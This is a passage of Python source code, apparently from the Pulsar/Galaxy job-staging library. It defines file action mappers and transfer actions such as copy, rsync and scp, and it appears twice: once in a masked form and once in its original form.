\"/\", \"action\": \"transfer\", \"path_types\": \"*any*\"} ] }''')\n >>> unstructured_mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'unstructured').action_type == u'transfer'\n True\n >>> match_type_only_mapper = mapper_for(default_action=\"none\", config_contents=r'''{\"paths\": [ {\"action\": \"transfer\", \"path_types\": \"input\"}, {\"action\": \"remote_copy\", \"path_types\": \"output\"} ] }''')\n >>> input_action = match_type_only_mapper.action({}, 'input')\n >>> input_action.action_type\n 'transfer'\n >>> output_action = match_type_only_mapper.action({}, 'output')\n >>> output_action.action_type\n 'remote_copy'\n \"\"\"\n\n def __init__(self, client=None, config=None):\n if config is None and client is None:\n message = (\n 'FileActionMapper must be constructed from either a client or a config dictionary.'\n )\n raise Exception(message)\n if config is None:\n config = self.__client_to_config(client)\n self.default_action = config.get('default_action', 'transfer')\n self.ssh_key = config.get('ssh_key', None)\n self.ssh_user = config.get('ssh_user', None)\n self.ssh_host = config.get('ssh_host', None)\n self.ssh_port = config.get('ssh_port', None)\n self.mappers = mappers_from_dicts(config.get('paths', []))\n self.files_endpoint = config.get('files_endpoint', None)\n\n def action(self, source, type, mapper=None):\n path = source.get('path', None)\n mapper = self.__find_mapper(path, type, mapper)\n action_class = self.__action_class(path, type, mapper)\n file_lister = DEFAULT_FILE_LISTER\n action_kwds = {}\n if mapper:\n file_lister = mapper.file_lister\n action_kwds = mapper.action_kwds\n action = action_class(source, file_lister=file_lister, **action_kwds)\n self.__process_action(action, type)\n return action\n\n def unstructured_mappers(self):\n \"\"\" Return mappers that will map 'unstructured' files (i.e. go beyond\n mapping inputs, outputs, and config files).\n \"\"\"\n return filter(lambda m: path_type.UNSTRUCTURED in m.path_types,\n self.mappers)\n\n def to_dict(self):\n return dict(default_action=self.default_action, files_endpoint=self\n .files_endpoint, ssh_key=self.ssh_key, ssh_user=self.ssh_user,\n ssh_port=self.ssh_port, ssh_host=self.ssh_host, paths=list(map(\n lambda m: m.to_dict(), self.mappers)))\n\n def __client_to_config(self, client):\n action_config_path = client.action_config_path\n if action_config_path:\n config = read_file(action_config_path)\n else:\n config = getattr(client, 'file_actions', {})\n config['default_action'] = client.default_file_action\n config['files_endpoint'] = client.files_endpoint\n for attr in ['ssh_key', 'ssh_user', 'ssh_port', 'ssh_host']:\n if hasattr(client, attr):\n config[attr] = getattr(client, attr)\n return config\n\n def __find_mapper(self, path, type, mapper=None):\n if not mapper:\n if path is not None:\n normalized_path = abspath(path)\n else:\n normalized_path = None\n for query_mapper in self.mappers:\n if query_mapper.matches(normalized_path, type):\n mapper = query_mapper\n break\n return mapper\n\n def __action_class(self, path, type, mapper):\n action_type = (self.default_action if type in\n ACTION_DEFAULT_PATH_TYPES else 'none')\n if mapper:\n action_type = mapper.action_type\n if type in ['workdir', 'jobdir', 'output_workdir',\n 'output_metadata', 'output_jobdir'] and action_type == 'none':\n action_type = 'copy'\n action_class = actions.get(action_type, None)\n if action_class is None:\n message_template = (\n 'Unknown action_type encountered %s while trying to map path %s'\n )\n message_args = action_type, path\n raise Exception(message_template % message_args)\n return action_class\n\n def __process_action(self, action, file_type):\n \"\"\" Extension point to populate extra action information after an\n action has been created.\n \"\"\"\n if getattr(action, 'inject_url', False):\n self.__inject_url(action, file_type)\n if getattr(action, 'inject_ssh_properties', False):\n self.__inject_ssh_properties(action)\n\n def __inject_url(self, action, file_type):\n url_base = self.files_endpoint\n if not url_base:\n raise Exception(MISSING_FILES_ENDPOINT_ERROR)\n if '?' not in url_base:\n url_base = '%s?' % url_base\n else:\n url_base = '%s&' % url_base\n url_params = urlencode({'path': action.path, 'file_type': file_type})\n action.url = f'{url_base}{url_params}'\n\n def __inject_ssh_properties(self, action):\n for attr in ['ssh_key', 'ssh_host', 'ssh_port', 'ssh_user']:\n action_attr = getattr(action, attr)\n if action_attr == UNSET_ACTION_KWD:\n client_default_attr = getattr(self, attr, None)\n setattr(action, attr, client_default_attr)\n if action.ssh_key is None:\n raise Exception(MISSING_SSH_KEY_ERROR)\n\n\n<mask token>\n\n\nclass BaseAction:\n whole_directory_transfer_supported = False\n action_spec: Dict[str, Any] = {}\n action_type: str\n\n def __init__(self, source, file_lister=None):\n self.source = source\n self.file_lister = file_lister or DEFAULT_FILE_LISTER\n\n @property\n def path(self):\n return self.source.get('path')\n\n def unstructured_map(self, path_helper):\n unstructured_map = self.file_lister.unstructured_map(self.path)\n if self.staging_needed:\n prefix = unique_path_prefix(self.path)\n for path, name in unstructured_map.items():\n unstructured_map[path] = join(prefix, name)\n else:\n path_rewrites = {}\n for path in unstructured_map:\n rewrite = self.path_rewrite(path_helper, path)\n if rewrite:\n path_rewrites[path] = rewrite\n unstructured_map = path_rewrites\n return unstructured_map\n\n @property\n def staging_needed(self):\n return self.staging != STAGING_ACTION_NONE\n\n @property\n def staging_action_local(self):\n return self.staging == STAGING_ACTION_LOCAL\n\n def _extend_base_dict(self, **kwds):\n base_dict = dict(path=self.path, source=self.source, action_type=\n self.action_type)\n base_dict.update(**kwds)\n return base_dict\n\n def to_dict(self):\n return self._extend_base_dict()\n\n def __str__(self):\n as_dict = self.to_dict()\n attribute_str = ''\n first = True\n for key, value in as_dict.items():\n if key == 'source':\n continue\n if first:\n first = False\n else:\n attribute_str += ','\n attribute_str += '{}={}'.format(key, value)\n return 'FileAction[%s]' % attribute_str\n\n\nclass NoneAction(BaseAction):\n \"\"\" This action indicates the corresponding path does not require any\n additional action. This should indicate paths that are available both on\n the Pulsar client (i.e. Galaxy server) and remote Pulsar server with the same\n paths. \"\"\"\n action_type = 'none'\n staging = STAGING_ACTION_NONE\n\n def to_dict(self):\n return self._extend_base_dict()\n\n @classmethod\n def from_dict(cls, action_dict):\n return NoneAction(source=action_dict['source'])\n\n def path_rewrite(self, path_helper, path=None):\n return None\n\n\nclass RewriteAction(BaseAction):\n \"\"\" This actin indicates the Pulsar server should simply rewrite the path\n to the specified file.\n \"\"\"\n action_spec = dict(source_directory=REQUIRED_ACTION_KWD,\n destination_directory=REQUIRED_ACTION_KWD)\n action_type = 'rewrite'\n staging = STAGING_ACTION_NONE\n\n def __init__(self, source, file_lister=None, source_directory=None,\n destination_directory=None):\n super().__init__(source, file_lister=file_lister)\n self.source_directory = source_directory\n self.destination_directory = destination_directory\n\n def to_dict(self):\n return self._extend_base_dict(source_directory=self.\n source_directory, destination_directory=self.destination_directory)\n\n @classmethod\n def from_dict(cls, action_dict):\n return RewriteAction(source=action_dict['source'], source_directory\n =action_dict['source_directory'], destination_directory=\n action_dict['destination_directory'])\n\n def path_rewrite(self, path_helper, path=None):\n if not path:\n path = self.path\n new_path = path_helper.from_posix_with_new_base(self.path, self.\n source_directory, self.destination_directory)\n return None if new_path == self.path else new_path\n\n\nclass TransferAction(BaseAction):\n \"\"\" This actions indicates that the Pulsar client should initiate an HTTP\n transfer of the corresponding path to the remote Pulsar server before\n launching the job. \"\"\"\n action_type = 'transfer'\n staging = STAGING_ACTION_LOCAL\n\n\nclass CopyAction(BaseAction):\n \"\"\" This action indicates that the Pulsar client should execute a file system\n copy of the corresponding path to the Pulsar staging directory prior to\n launching the corresponding job. \"\"\"\n action_type = 'copy'\n staging = STAGING_ACTION_LOCAL\n\n\nclass RemoteCopyAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should copy the file before\n execution via direct file system copy. This is like a CopyAction, but\n it indicates the action should occur on the Pulsar server instead of on\n the client.\n \"\"\"\n action_type = 'remote_copy'\n staging = STAGING_ACTION_REMOTE\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n copy_to_path(open(self.path, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n destination = self.path\n parent_directory = dirname(destination)\n if not exists(parent_directory):\n makedirs(parent_directory)\n with open(pulsar_path, 'rb') as f:\n copy_to_path(f, destination)\n\n\nclass RemoteTransferAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should transfer the file before\n execution via one of the remote transfer implementations. This is like a TransferAction, but\n it indicates the action requires network access to the staging server, and\n should be executed via ssh/rsync/etc\n \"\"\"\n inject_url = True\n action_type = 'remote_transfer'\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, url=None):\n super().__init__(source, file_lister=file_lister)\n self.url = url\n\n def to_dict(self):\n return self._extend_base_dict(url=self.url)\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteTransferAction(source=action_dict['source'], url=\n action_dict['url'])\n\n def write_to_path(self, path):\n get_file(self.url, path)\n\n def write_from_path(self, pulsar_path):\n post_file(self.url, pulsar_path)\n\n\nclass RemoteObjectStoreCopyAction(BaseAction):\n \"\"\"\n \"\"\"\n action_type = 'remote_object_store_copy'\n staging = STAGING_ACTION_REMOTE\n inject_object_store = True\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteObjectStoreCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n assert self.object_store\n assert 'object_store_ref' in self.source\n object_store_ref = self.source['object_store_ref']\n dataset_object = Bunch(id=object_store_ref['dataset_id'], uuid=\n object_store_ref['dataset_uuid'], object_store_id=\n object_store_ref['object_store_id'])\n filename = self.object_store.get_filename(dataset_object)\n copy_to_path(open(filename, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n raise NotImplementedError(\n 'Writing raw files to object store not supported at this time.')\n\n\nclass PubkeyAuthenticatedTransferAction(BaseAction):\n \"\"\"Base class for file transfers requiring an SSH public/private key\n \"\"\"\n inject_ssh_properties = True\n action_spec = dict(ssh_key=UNSET_ACTION_KWD, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD)\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD, ssh_key=\n UNSET_ACTION_KWD):\n super().__init__(source, file_lister=file_lister)\n self.ssh_user = ssh_user\n self.ssh_host = ssh_host\n self.ssh_port = ssh_port\n self.ssh_key = ssh_key\n\n def to_dict(self):\n return self._extend_base_dict(ssh_user=self.ssh_user, ssh_host=self\n .ssh_host, ssh_port=self.ssh_port)\n\n @contextmanager\n def _serialized_key(self):\n key_file = self.__serialize_ssh_key()\n yield key_file\n self.__cleanup_ssh_key(key_file)\n\n def __serialize_ssh_key(self):\n f = tempfile.NamedTemporaryFile(delete=False)\n if self.ssh_key is not None:\n f.write(self.ssh_key.encode('utf-8'))\n else:\n raise Exception('SSH_KEY not available')\n return f.name\n\n def __cleanup_ssh_key(self, keyfile):\n if exists(keyfile):\n unlink(keyfile)\n\n\nclass RsyncTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_rsync_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return RsyncTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n rsync_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n rsync_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass ScpTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_scp_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return ScpTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n scp_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n scp_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass MessageAction:\n \"\"\" Sort of pseudo action describing \"files\" store in memory and\n transferred via message (HTTP, Python-call, MQ, etc...)\n \"\"\"\n action_type = 'message'\n staging = STAGING_ACTION_DEFAULT\n\n def __init__(self, contents, client=None):\n self.contents = contents\n self.client = client\n\n @property\n def staging_needed(self):\n return True\n\n @property\n def staging_action_local(self):\n return self.client.prefer_local_staging\n\n def to_dict(self):\n return dict(contents=self.contents, action_type=MessageAction.\n action_type)\n\n @classmethod\n def from_dict(cls, action_dict):\n return MessageAction(contents=action_dict['contents'])\n\n def write_to_path(self, path):\n open(path, 'w').write(self.contents)\n\n\n<mask token>\n\n\ndef from_dict(action_dict):\n action_type = action_dict.get('action_type', None)\n target_class = None\n for action_class in DICTIFIABLE_ACTION_CLASSES:\n if action_type == action_class.action_type:\n target_class = action_class\n if not target_class:\n message = (\n 'Failed to recover action from dictionary - invalid action type specified %s.'\n % action_type)\n raise Exception(message)\n if 'source' in action_dict:\n action_dict.pop('path')\n elif 'path' in action_dict:\n source = {'path': action_dict.pop('path')}\n action_dict['source'] = source\n return target_class.from_dict(action_dict)\n\n\nclass BasePathMapper:\n match_type: str\n\n def __init__(self, config):\n action_type = config.get('action', DEFAULT_MAPPED_ACTION)\n action_class = actions.get(action_type, None)\n action_kwds = action_class.action_spec.copy()\n for key, value in action_kwds.items():\n if key in config:\n action_kwds[key] = config[key]\n elif value is REQUIRED_ACTION_KWD:\n message_template = (\n 'action_type %s requires key word argument %s')\n message = message_template % (action_type, key)\n raise Exception(message)\n else:\n action_kwds[key] = value\n self.action_type = action_type\n self.action_kwds = action_kwds\n path_types_str = config.get('path_types', '*defaults*')\n path_types_str = path_types_str.replace('*defaults*', ','.join(\n ACTION_DEFAULT_PATH_TYPES))\n path_types_str = path_types_str.replace('*any*', ','.join(\n ALL_PATH_TYPES))\n self.path_types = path_types_str.split(',')\n self.file_lister = FileLister(config)\n\n def matches(self, path, path_type):\n path_type_matches = path_type in self.path_types\n rval = path_type_matches and self._path_matches(path)\n return rval\n\n def _extend_base_dict(self, **kwds):\n base_dict = dict(action=self.action_type, path_types=','.join(self.\n path_types), match_type=self.match_type)\n base_dict.update(self.file_lister.to_dict())\n base_dict.update(self.action_kwds)\n base_dict.update(**kwds)\n return base_dict\n\n def to_pattern(self):\n raise NotImplementedError()\n\n\nclass PathTypeOnlyMapper(BasePathMapper):\n match_type = 'path_type_only'\n\n def __init__(self, config):\n super().__init__(config)\n\n def _path_matches(self, path):\n return True\n\n def to_dict(self):\n return self._extend_base_dict()\n\n\nclass PrefixPathMapper(BasePathMapper):\n match_type = 'prefix'\n\n def __init__(self, config):\n super().__init__(config)\n self.prefix_path = abspath(config['path'])\n\n def _path_matches(self, path):\n return path is not None and path.startswith(self.prefix_path)\n\n def to_pattern(self):\n pattern_str = '({}{}[^\\\\s,\\\\\"\\\\\\']+)'.format(escape(self.\n prefix_path), escape(sep))\n return compile(pattern_str)\n\n def to_dict(self):\n return self._extend_base_dict(path=self.prefix_path)\n\n\nclass GlobPathMapper(BasePathMapper):\n match_type = 'glob'\n\n def __init__(self, config):\n super().__init__(config)\n self.glob_path = config['path']\n\n def _path_matches(self, path):\n return path is not None and fnmatch.fnmatch(path, self.glob_path)\n\n def to_pattern(self):\n return compile(fnmatch.translate(self.glob_path))\n\n def to_dict(self):\n return self._extend_base_dict(path=self.glob_path)\n\n\nclass RegexPathMapper(BasePathMapper):\n match_type = 'regex'\n\n def __init__(self, config):\n super().__init__(config)\n self.pattern_raw = config['path']\n self.pattern = compile(self.pattern_raw)\n\n def _path_matches(self, path):\n return path is not None and self.pattern.match(path) is not None\n\n def to_pattern(self):\n return self.pattern\n\n def to_dict(self):\n return self._extend_base_dict(path=self.pattern_raw)\n\n\n<mask token>\n\n\ndef _mappper_from_dict(mapper_dict):\n if 'path' in mapper_dict:\n map_type = mapper_dict.get('match_type', DEFAULT_PATH_MAPPER_TYPE)\n else:\n map_type = 'path_type_only'\n return MAPPER_CLASS_DICT[map_type](mapper_dict)\n\n\nclass FileLister:\n\n def __init__(self, config):\n self.depth = int(config.get('depth', '0'))\n\n def to_dict(self):\n return dict(depth=self.depth)\n\n def unstructured_map(self, path):\n depth = self.depth\n if self.depth == 0:\n return {path: basename(path)}\n else:\n while depth > 0:\n path = dirname(path)\n depth -= 1\n return {join(path, f): f for f in directory_files(path)}\n\n\n<mask token>\n", "step-5": "import fnmatch\nimport tempfile\nfrom contextlib import contextmanager\nfrom os import (\n makedirs,\n unlink,\n)\nfrom os.path import (\n abspath,\n basename,\n dirname,\n exists,\n join,\n sep,\n)\nfrom re import (\n compile,\n escape,\n)\nfrom typing import (\n Any,\n Dict,\n List,\n Type,\n)\nfrom urllib.parse import urlencode\n\nfrom galaxy.util.bunch import Bunch\n\nfrom .config_util import read_file\nfrom .transport import (\n get_file,\n post_file,\n rsync_get_file,\n rsync_post_file,\n scp_get_file,\n scp_post_file,\n)\nfrom .util import (\n copy_to_path,\n directory_files,\n unique_path_prefix,\n)\n\nDEFAULT_MAPPED_ACTION = 'transfer' # Not really clear to me what this should be, exception?\nDEFAULT_PATH_MAPPER_TYPE = 'prefix'\n\nSTAGING_ACTION_REMOTE = \"remote\"\nSTAGING_ACTION_LOCAL = \"local\"\nSTAGING_ACTION_NONE = None\nSTAGING_ACTION_DEFAULT = \"default\"\n\n# Poor man's enum.\npath_type = Bunch(\n # Galaxy input datasets and extra files.\n INPUT=\"input\",\n # Galaxy config and param files.\n CONFIG=\"config\",\n # Files from tool's tool_dir (for now just wrapper if available).\n TOOL=\"tool\",\n # Input tool work dir files - e.g. task-split input file\n WORKDIR=\"workdir\",\n # Job directory files (e.g. tool standard input/output and containerized command).\n JOBDIR=\"jobdir\",\n # Input metadata dir files - e.g. metadata files, etc..\n METADATA=\"metadata\",\n # Galaxy output datasets in their final home.\n OUTPUT=\"output\",\n # Galaxy from_work_dir output paths and other files (e.g. galaxy.json)\n OUTPUT_WORKDIR=\"output_workdir\",\n # Meta job and data files (e.g. Galaxy metadata generation files and\n # metric instrumentation files)\n OUTPUT_METADATA=\"output_metadata\",\n # Job directory files output.\n OUTPUT_JOBDIR=\"output_jobdir\",\n # Other fixed tool parameter paths (likely coming from tool data, but not\n # necessarily).\n UNSTRUCTURED=\"unstructured\",\n)\n\n\nACTION_DEFAULT_PATH_TYPES = [\n path_type.INPUT,\n path_type.CONFIG,\n path_type.TOOL,\n path_type.WORKDIR,\n path_type.JOBDIR,\n path_type.METADATA,\n path_type.OUTPUT,\n path_type.OUTPUT_WORKDIR,\n path_type.OUTPUT_METADATA,\n path_type.OUTPUT_JOBDIR,\n]\nALL_PATH_TYPES = ACTION_DEFAULT_PATH_TYPES + [path_type.UNSTRUCTURED]\n\nMISSING_FILES_ENDPOINT_ERROR = \"Attempted to use remote_transfer action without defining a files_endpoint.\"\nMISSING_SSH_KEY_ERROR = \"Attempt to use file transfer action requiring an SSH key without specifying a ssh_key.\"\n\n\nclass FileActionMapper:\n \"\"\"\n Objects of this class define how paths are mapped to actions.\n\n >>> json_string = r'''{\"paths\": [ \\\n {\"path\": \"/opt/galaxy\", \"action\": \"none\"}, \\\n {\"path\": \"/galaxy/data\", \"action\": \"transfer\"}, \\\n {\"path\": \"/cool/bamfiles/**/*.bam\", \"action\": \"copy\", \"match_type\": \"glob\"}, \\\n {\"path\": \".*/dataset_\\\\\\\\d+.dat\", \"action\": \"copy\", \"match_type\": \"regex\"} \\\n ]}'''\n >>> from tempfile import NamedTemporaryFile\n >>> from os import unlink\n >>> def mapper_for(default_action, config_contents):\n ... f = NamedTemporaryFile(delete=False)\n ... f.write(config_contents.encode('UTF-8'))\n ... f.close()\n ... mock_client = Bunch(default_file_action=default_action, action_config_path=f.name, files_endpoint=None)\n ... mapper = FileActionMapper(mock_client)\n ... as_dict = config=mapper.to_dict()\n ... mapper = FileActionMapper(config=as_dict) # Serialize and deserialize it to make sure still works\n ... unlink(f.name)\n ... return mapper\n >>> mapper = mapper_for(default_action='none', config_contents=json_string)\n >>> # Test first config line above, implicit path prefix mapper\n >>> action = mapper.action({'path': '/opt/galaxy/tools/filters/catWrapper.py'}, 'input')\n >>> action.action_type == u'none'\n True\n >>> action.staging_needed\n False\n >>> # Test another (2nd) mapper, this one with a different action\n >>> action = mapper.action({'path': '/galaxy/data/files/000/dataset_1.dat'}, 'input')\n >>> action.action_type == u'transfer'\n True\n >>> action.staging_needed\n True\n >>> # Always at least copy work_dir outputs.\n >>> action = mapper.action({'path': '/opt/galaxy/database/working_directory/45.sh'}, 'workdir')\n >>> action.action_type == u'copy'\n True\n >>> action.staging_needed\n True\n >>> # Test glob mapper (matching test)\n >>> mapper.action({'path': '/cool/bamfiles/projectABC/study1/patient3.bam'}, 'input').action_type == u'copy'\n True\n >>> # Test glob mapper (non-matching test)\n >>> mapper.action({'path': '/cool/bamfiles/projectABC/study1/patient3.bam.bai'}, 'input').action_type == u'none'\n True\n >>> # Regex mapper test.\n >>> mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'input').action_type == u'copy'\n True\n >>> # Doesn't map unstructured paths by default\n >>> mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'unstructured').action_type == u'none'\n True\n >>> input_only_mapper = mapper_for(default_action=\"none\", config_contents=r'''{\"paths\": [ \\\n {\"path\": \"/\", \"action\": \"transfer\", \"path_types\": \"input\"} \\\n ] }''')\n >>> input_only_mapper.action({'path': '/dataset_1.dat'}, 'input').action_type == u'transfer'\n True\n >>> input_only_mapper.action({'path': '/dataset_1.dat'}, 'output').action_type == u'none'\n True\n >>> unstructured_mapper = mapper_for(default_action=\"none\", config_contents=r'''{\"paths\": [ \\\n {\"path\": \"/\", \"action\": \"transfer\", \"path_types\": \"*any*\"} \\\n ] }''')\n >>> unstructured_mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'unstructured').action_type == u'transfer'\n True\n >>> match_type_only_mapper = mapper_for(default_action=\"none\", config_contents=r'''{\"paths\": [ \\\n {\"action\": \"transfer\", \"path_types\": \"input\"}, \\\n {\"action\": \"remote_copy\", \"path_types\": \"output\"} \\\n ] }''')\n >>> input_action = match_type_only_mapper.action({}, 'input')\n >>> input_action.action_type\n 'transfer'\n >>> output_action = match_type_only_mapper.action({}, 'output')\n >>> output_action.action_type\n 'remote_copy'\n \"\"\"\n\n def __init__(self, client=None, config=None):\n if config is None and client is None:\n message = \"FileActionMapper must be constructed from either a client or a config dictionary.\"\n raise Exception(message)\n if config is None:\n config = self.__client_to_config(client)\n self.default_action = config.get(\"default_action\", \"transfer\")\n self.ssh_key = config.get(\"ssh_key\", None)\n self.ssh_user = config.get(\"ssh_user\", None)\n self.ssh_host = config.get(\"ssh_host\", None)\n self.ssh_port = config.get(\"ssh_port\", None)\n self.mappers = mappers_from_dicts(config.get(\"paths\", []))\n self.files_endpoint = config.get(\"files_endpoint\", None)\n\n def action(self, source, type, mapper=None):\n path = source.get(\"path\", None)\n mapper = self.__find_mapper(path, type, mapper)\n action_class = self.__action_class(path, type, mapper)\n file_lister = DEFAULT_FILE_LISTER\n action_kwds = {}\n if mapper:\n file_lister = mapper.file_lister\n action_kwds = mapper.action_kwds\n action = action_class(source, file_lister=file_lister, **action_kwds)\n self.__process_action(action, type)\n return action\n\n def unstructured_mappers(self):\n \"\"\" Return mappers that will map 'unstructured' files (i.e. go beyond\n mapping inputs, outputs, and config files).\n \"\"\"\n return filter(lambda m: path_type.UNSTRUCTURED in m.path_types, self.mappers)\n\n def to_dict(self):\n return dict(\n default_action=self.default_action,\n files_endpoint=self.files_endpoint,\n ssh_key=self.ssh_key,\n ssh_user=self.ssh_user,\n ssh_port=self.ssh_port,\n ssh_host=self.ssh_host,\n paths=list(map(lambda m: m.to_dict(), self.mappers))\n )\n\n def __client_to_config(self, client):\n action_config_path = client.action_config_path\n if action_config_path:\n config = read_file(action_config_path)\n else:\n config = getattr(client, \"file_actions\", {})\n config[\"default_action\"] = client.default_file_action\n config[\"files_endpoint\"] = client.files_endpoint\n for attr in ['ssh_key', 'ssh_user', 'ssh_port', 'ssh_host']:\n if hasattr(client, attr):\n config[attr] = getattr(client, attr)\n return config\n\n def __find_mapper(self, path, type, mapper=None):\n if not mapper:\n if path is not None:\n normalized_path = abspath(path)\n else:\n normalized_path = None\n for query_mapper in self.mappers:\n if query_mapper.matches(normalized_path, type):\n mapper = query_mapper\n break\n return mapper\n\n def __action_class(self, path, type, mapper):\n action_type = self.default_action if type in ACTION_DEFAULT_PATH_TYPES else \"none\"\n if mapper:\n action_type = mapper.action_type\n if type in [\"workdir\", \"jobdir\", \"output_workdir\", \"output_metadata\", \"output_jobdir\"] and action_type == \"none\":\n # We are changing the working_directory/job_directory relative to what\n # Galaxy would use, these need to be copied over.\n action_type = \"copy\"\n action_class = actions.get(action_type, None)\n if action_class is None:\n message_template = \"Unknown action_type encountered %s while trying to map path %s\"\n message_args = (action_type, path)\n raise Exception(message_template % message_args)\n return action_class\n\n def __process_action(self, action, file_type):\n \"\"\" Extension point to populate extra action information after an\n action has been created.\n \"\"\"\n if getattr(action, \"inject_url\", False):\n self.__inject_url(action, file_type)\n if getattr(action, \"inject_ssh_properties\", False):\n self.__inject_ssh_properties(action)\n\n def __inject_url(self, action, file_type):\n url_base = self.files_endpoint\n if not url_base:\n raise Exception(MISSING_FILES_ENDPOINT_ERROR)\n if \"?\" not in url_base:\n url_base = \"%s?\" % url_base\n else:\n url_base = \"%s&\" % url_base\n url_params = urlencode({\"path\": action.path, \"file_type\": file_type})\n action.url = f\"{url_base}{url_params}\"\n\n def __inject_ssh_properties(self, action):\n for attr in [\"ssh_key\", \"ssh_host\", \"ssh_port\", \"ssh_user\"]:\n action_attr = getattr(action, attr)\n if action_attr == UNSET_ACTION_KWD:\n client_default_attr = getattr(self, attr, None)\n setattr(action, attr, client_default_attr)\n\n if action.ssh_key is None:\n raise Exception(MISSING_SSH_KEY_ERROR)\n\n\nREQUIRED_ACTION_KWD = object()\nUNSET_ACTION_KWD = \"__UNSET__\"\n\n\nclass BaseAction:\n whole_directory_transfer_supported = False\n action_spec: Dict[str, Any] = {}\n action_type: str\n\n def __init__(self, source, file_lister=None):\n self.source = source\n self.file_lister = file_lister or DEFAULT_FILE_LISTER\n\n @property\n def path(self):\n return self.source.get(\"path\")\n\n def unstructured_map(self, path_helper):\n unstructured_map = self.file_lister.unstructured_map(self.path)\n if self.staging_needed:\n # To ensure uniqueness, prepend unique prefix to each name\n prefix = unique_path_prefix(self.path)\n for path, name in unstructured_map.items():\n unstructured_map[path] = join(prefix, name)\n else:\n path_rewrites = {}\n for path in unstructured_map:\n rewrite = self.path_rewrite(path_helper, path)\n if rewrite:\n path_rewrites[path] = rewrite\n unstructured_map = path_rewrites\n return unstructured_map\n\n @property\n def staging_needed(self):\n return self.staging != STAGING_ACTION_NONE\n\n @property\n def staging_action_local(self):\n return self.staging == STAGING_ACTION_LOCAL\n\n def _extend_base_dict(self, **kwds):\n base_dict = dict(\n path=self.path, # For older Pulsar servers (pre-0.13.0?)\n source=self.source,\n action_type=self.action_type,\n )\n base_dict.update(**kwds)\n return base_dict\n\n def to_dict(self):\n return self._extend_base_dict()\n\n def __str__(self):\n as_dict = self.to_dict()\n attribute_str = \"\"\n first = True\n for key, value in as_dict.items():\n if key == \"source\":\n continue\n if first:\n first = False\n else:\n attribute_str += \",\"\n attribute_str += \"{}={}\".format(key, value)\n return \"FileAction[%s]\" % attribute_str\n\n\nclass NoneAction(BaseAction):\n \"\"\" This action indicates the corresponding path does not require any\n additional action. This should indicate paths that are available both on\n the Pulsar client (i.e. Galaxy server) and remote Pulsar server with the same\n paths. \"\"\"\n action_type = \"none\"\n staging = STAGING_ACTION_NONE\n\n def to_dict(self):\n return self._extend_base_dict()\n\n @classmethod\n def from_dict(cls, action_dict):\n return NoneAction(source=action_dict[\"source\"])\n\n def path_rewrite(self, path_helper, path=None):\n return None\n\n\nclass RewriteAction(BaseAction):\n \"\"\" This actin indicates the Pulsar server should simply rewrite the path\n to the specified file.\n \"\"\"\n action_spec = dict(\n source_directory=REQUIRED_ACTION_KWD,\n destination_directory=REQUIRED_ACTION_KWD\n )\n action_type = \"rewrite\"\n staging = STAGING_ACTION_NONE\n\n def __init__(self, source, file_lister=None, source_directory=None, destination_directory=None):\n super().__init__(source, file_lister=file_lister)\n self.source_directory = source_directory\n self.destination_directory = destination_directory\n\n def to_dict(self):\n return self._extend_base_dict(\n source_directory=self.source_directory,\n destination_directory=self.destination_directory,\n )\n\n @classmethod\n def from_dict(cls, action_dict):\n return RewriteAction(\n source=action_dict[\"source\"],\n source_directory=action_dict[\"source_directory\"],\n destination_directory=action_dict[\"destination_directory\"],\n )\n\n def path_rewrite(self, path_helper, path=None):\n if not path:\n path = self.path\n new_path = path_helper.from_posix_with_new_base(self.path, self.source_directory, self.destination_directory)\n return None if new_path == self.path else new_path\n\n\nclass TransferAction(BaseAction):\n \"\"\" This actions indicates that the Pulsar client should initiate an HTTP\n transfer of the corresponding path to the remote Pulsar server before\n launching the job. \"\"\"\n action_type = \"transfer\"\n staging = STAGING_ACTION_LOCAL\n\n\nclass CopyAction(BaseAction):\n \"\"\" This action indicates that the Pulsar client should execute a file system\n copy of the corresponding path to the Pulsar staging directory prior to\n launching the corresponding job. \"\"\"\n action_type = \"copy\"\n staging = STAGING_ACTION_LOCAL\n\n\nclass RemoteCopyAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should copy the file before\n execution via direct file system copy. This is like a CopyAction, but\n it indicates the action should occur on the Pulsar server instead of on\n the client.\n \"\"\"\n action_type = \"remote_copy\"\n staging = STAGING_ACTION_REMOTE\n\n @classmethod\n def from_dict(cls, 